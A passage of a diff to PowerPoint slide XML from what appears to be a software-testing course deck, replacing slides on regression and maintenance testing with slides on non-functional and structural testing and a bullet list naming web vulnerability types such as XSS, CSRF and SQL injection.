-          <a:bodyPr rtlCol="0" anchor="ctr"/>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="ctr"/>
-            <a:endParaRPr lang="en-US">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="17" name="Прямоугольник 16"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1224136" y="3212976"/>
-            <a:ext cx="5652120" cy="369332"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t>Condition testing</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="12" name="Flowchart: Connector 13"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="936104" y="3689504"/>
-            <a:ext cx="84841" cy="99536"/>
-          </a:xfrm>
-          <a:prstGeom prst="flowChartConnector">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:style>
-          <a:lnRef idx="1">
-            <a:schemeClr val="accent6"/>
-          </a:lnRef>
-          <a:fillRef idx="3">
-            <a:schemeClr val="accent6"/>
-          </a:fillRef>
-          <a:effectRef idx="2">
-            <a:schemeClr val="accent6"/>
-          </a:effectRef>
-          <a:fontRef idx="minor">
-            <a:schemeClr val="lt1"/>
-          </a:fontRef>
-        </p:style>
-        <p:txBody>
-          <a:bodyPr rtlCol="0" anchor="ctr"/>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="ctr"/>
-            <a:endParaRPr lang="en-US">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="13" name="Прямоугольник 12"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1224136" y="3573016"/>
-            <a:ext cx="5652120" cy="369332"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t>Multiple condition testing</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="29" name="Rectangle 6"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="611560" y="4078813"/>
-            <a:ext cx="7416947" cy="646331"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t>All these testing techniques help measure the code coverage: statement coverage, decision coverage, condition coverage etc. </a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" b="1" u="sng" dirty="0"/>
+              <a:t>Different kinds of vulnerability:</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1">
+              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>XSS (Cross-Site Scripting)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1">
+              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>XSRF/ CSRF (Request Forgery)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1">
+              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>Code Injections (SQL, PHP, ASP etc.)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1">
+              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>Server-Side Includes (SSI) Injections</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1">
+              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>Authorization Bypass</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns="" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4060775951"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="4060775951"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -11483,7 +11135,7 @@
     <a:masterClrMapping/>
   </p:clrMapOvr>
   <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
-    <mc:Choice xmlns="" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" Requires="p14">
+    <mc:Choice xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" Requires="p14">
       <p:transition spd="slow" p14:dur="2000"/>
     </mc:Choice>
     <mc:Fallback>
@@ -11526,7 +11178,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="457200" y="533400"/>
-            <a:ext cx="5052024" cy="630942"/>
+            <a:ext cx="4435766" cy="630942"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -11555,7 +11207,7 @@
                   </a:outerShdw>
                 </a:effectLst>
               </a:rPr>
-              <a:t>Testing Related to Changes</a:t>
+              <a:t>Non-functional Testing</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" sz="3500" dirty="0">
               <a:solidFill>
@@ -11584,7 +11236,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="611437" y="1712098"/>
-            <a:ext cx="7416947" cy="1200329"/>
+            <a:ext cx="7416947" cy="646331"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -11598,7 +11250,15 @@
           <a:p>
             <a:r>
               <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t>Regression testing may be performed at all test levels, and includes functional, non-functional and structural testing. Regression test suites are run many times and generally evolve slowly, so regression testing is a strong candidate for automation. </a:t>
+              <a:t>The non-function characteristics are </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" b="1" u="sng" dirty="0" smtClean="0"/>
+              <a:t>“how”</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t> the system does. Non-functional testing may be performed at all test levels.</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" b="1" u="sng" dirty="0"/>
           </a:p>
@@ -11606,13 +11266,13 @@
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="12" name="Flowchart: Connector 13"/>
+          <p:cNvPr id="14" name="Flowchart: Connector 13"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="936104" y="3185448"/>
+            <a:off x="958767" y="2636912"/>
             <a:ext cx="84841" cy="99536"/>
           </a:xfrm>
           <a:prstGeom prst="flowChartConnector">
@@ -11648,14 +11308,14 @@
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="13" name="Прямоугольник 12"/>
+          <p:cNvPr id="9" name="Прямоугольник 8"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="1224136" y="3068960"/>
-            <a:ext cx="5652120" cy="369332"/>
+            <a:off x="1224136" y="2492896"/>
+            <a:ext cx="6588224" cy="369332"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -11669,7 +11329,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t>Smoke testing</a:t>
+              <a:t>Load testing</a:t>
             </a:r>
             <a:endParaRPr lang="ru-RU" dirty="0"/>
           </a:p>
@@ -11677,13 +11337,13 @@
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="15" name="Flowchart: Connector 13"/>
+          <p:cNvPr id="10" name="Flowchart: Connector 13"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="936104" y="3617496"/>
+            <a:off x="936104" y="2969424"/>
             <a:ext cx="84841" cy="99536"/>
           </a:xfrm>
           <a:prstGeom prst="flowChartConnector">
@@ -11719,13 +11379,13 @@
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="18" name="Прямоугольник 17"/>
+          <p:cNvPr id="11" name="Прямоугольник 10"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="1224136" y="3501008"/>
+            <a:off x="1224136" y="2852936"/>
             <a:ext cx="5652120" cy="369332"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
@@ -11740,7 +11400,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t>Sanity testing</a:t>
+              <a:t>Performance testing</a:t>
             </a:r>
             <a:endParaRPr lang="ru-RU" dirty="0"/>
           </a:p>
@@ -11748,7 +11408,149 @@
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="19" name="Flowchart: Connector 13"/>
+          <p:cNvPr id="16" name="Flowchart: Connector 13"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="936104" y="3329464"/>
+            <a:ext cx="84841" cy="99536"/>
+          </a:xfrm>
+          <a:prstGeom prst="flowChartConnector">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent6"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent6"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent6"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr lang="en-US">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="17" name="Прямоугольник 16"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1224136" y="3212976"/>
+            <a:ext cx="5652120" cy="369332"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>Stress testing</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="12" name="Flowchart: Connector 13"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="936104" y="3689504"/>
+            <a:ext cx="84841" cy="99536"/>
+          </a:xfrm>
+          <a:prstGeom prst="flowChartConnector">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent6"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent6"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent6"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr lang="en-US">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="13" name="Прямоугольник 12"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1224136" y="3573016"/>
+            <a:ext cx="5652120" cy="369332"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>Usability testing</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="15" name="Flowchart: Connector 13"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
@@ -11790,14 +11592,14 @@
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="20" name="Прямоугольник 19"/>
+          <p:cNvPr id="18" name="Прямоугольник 17"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
             <a:off x="1224136" y="3933056"/>
-            <a:ext cx="5652120" cy="646331"/>
+            <a:ext cx="5652120" cy="369332"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -11811,7 +11613,362 @@
           <a:p>
             <a:r>
               <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t>Bug regression, old bug regression and side effect testing as parts of regression testing</a:t>
+              <a:t>Maintainability testing</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="19" name="Flowchart: Connector 13"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="936104" y="4409584"/>
+            <a:ext cx="84841" cy="99536"/>
+          </a:xfrm>
+          <a:prstGeom prst="flowChartConnector">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent6"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent6"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent6"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr lang="en-US">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="20" name="Прямоугольник 19"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1224136" y="4293096"/>
+            <a:ext cx="5652120" cy="369332"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>Portability testing</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="21" name="Flowchart: Connector 13"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="936104" y="4769624"/>
+            <a:ext cx="84841" cy="99536"/>
+          </a:xfrm>
+          <a:prstGeom prst="flowChartConnector">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent6"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent6"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent6"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr lang="en-US">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="22" name="Прямоугольник 21"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1224136" y="4653136"/>
+            <a:ext cx="5652120" cy="369332"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>Reliability testing</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="23" name="Flowchart: Connector 13"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="936104" y="5120372"/>
+            <a:ext cx="84841" cy="99536"/>
+          </a:xfrm>
+          <a:prstGeom prst="flowChartConnector">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent6"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent6"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent6"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr lang="en-US">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="24" name="Прямоугольник 23"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1224136" y="5003884"/>
+            <a:ext cx="5652120" cy="369332"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>Volume testing</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="25" name="Flowchart: Connector 13"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="936104" y="5480412"/>
+            <a:ext cx="84841" cy="99536"/>
+          </a:xfrm>
+          <a:prstGeom prst="flowChartConnector">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent6"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent6"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent6"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr lang="en-US">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="26" name="Прямоугольник 25"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1224136" y="5363924"/>
+            <a:ext cx="5652120" cy="369332"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>Installation testing</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="27" name="Flowchart: Connector 13"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="936104" y="5840452"/>
+            <a:ext cx="84841" cy="99536"/>
+          </a:xfrm>
+          <a:prstGeom prst="flowChartConnector">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent6"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent6"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent6"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr lang="en-US">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="28" name="Прямоугольник 27"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1224136" y="5723964"/>
+            <a:ext cx="5652120" cy="369332"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>Configuration testing</a:t>
             </a:r>
             <a:endParaRPr lang="ru-RU" dirty="0"/>
           </a:p>
@@ -11820,7 +11977,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns="" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4060775951"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="4060775951"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -11828,7 +11985,7 @@
     <a:masterClrMapping/>
   </p:clrMapOvr>
   <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
-    <mc:Choice xmlns="" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" Requires="p14">
+    <mc:Choice xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" Requires="p14">
       <p:transition spd="slow" p14:dur="2000"/>
     </mc:Choice>
     <mc:Fallback>
@@ -11871,7 +12028,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="457200" y="533400"/>
-            <a:ext cx="3957109" cy="630942"/>
+            <a:ext cx="3349315" cy="630942"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -11900,7 +12057,7 @@
                   </a:outerShdw>
                 </a:effectLst>
               </a:rPr>
-              <a:t>Maintenance Testing</a:t>
+              <a:t>Structural Testing</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" sz="3500" dirty="0">
               <a:solidFill>
@@ -11929,7 +12086,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="611437" y="1712098"/>
-            <a:ext cx="7416947" cy="2308324"/>
+            <a:ext cx="7416947" cy="646331"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -11943,34 +12100,337 @@
           <a:p>
             <a:r>
               <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t>Once deployed, a software system is often in service for years or decades. During this time the system, its configuration data, or its environment are often corrected, changed or extended.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t>So, the maintenance testing is necessary.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t>It is testing the changes to an operational system or the impact of a changed environment to an operational system.</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
+              <a:t>Structural </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" b="1" u="sng" dirty="0" smtClean="0"/>
+              <a:t>(white-box)</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t> testing may be performed at all test levels. It is based on examination of internal (back-end) system behavior.</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" b="1" u="sng" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="14" name="Flowchart: Connector 13"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="958767" y="2636912"/>
+            <a:ext cx="84841" cy="99536"/>
+          </a:xfrm>
+          <a:prstGeom prst="flowChartConnector">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:style>
